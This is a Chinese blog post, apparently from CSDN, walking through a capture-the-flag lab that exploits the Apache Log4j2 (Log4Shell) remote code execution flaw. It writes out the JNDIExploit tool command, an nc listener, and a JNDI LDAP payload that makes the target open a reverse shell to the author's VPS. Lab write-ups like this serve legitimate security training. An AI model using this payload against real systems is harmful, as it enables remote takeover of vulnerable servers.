封神台尤里的复仇Ⅰ 小芳 第九章

此关为apache log4j2远程代码执行漏洞

注意!此关需要用vps,否则网站无法连接到我们,无法进行反弹连接

项目部署阿里云服务器详细流程_项目部署到阿里云服务器-CSDN博客

不用全部布置完,开要用到的端口和做好java环境布置就行

这关对环境要求非常高!!!我被折磨了两天

编译环境和攻击机的环境要一致,否则会一直无法反弹成功,我都使用jdk-8u201的,各位看自己情况

这里只介绍简单的一种方法,在进行前可以先用dnslog平台进行漏洞验证,此处不做赘述,

此处有数据交互,选取此处进行jndi注入

利用宝塔配置jdk环境的详细图文教程_java_脚本之家

https://download.oracle.com/otn/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1715482758_b31f3658be41b31afadf19e104e0585e

注意自己vps的架构,否则配置完也会报找不到路径

jndi注入工具:

https://codeload.github.com/black9/Log4shell_JNDIExploit/zip/refs/heads/main

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 1389 -p 7777 -i vps的ip

再起一个窗口开启监听,我这里用的xshell

nc -lvvp 端口号

然后构造payload往交互的地方,/*用户名密码都行*/一丢就完事

${jndi:ldap://vps ip:1389/Basic/ReverseShell/vps ip/监听的端口}

这里又变成1.8.0_111

需要一致,否则不成功

重新去下,然后配置

Java Archive Downloads - Java SE 8 | Oracle Argentina

真是折磨

这里反弹成功

okok!第一章圆满结束!!!

  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值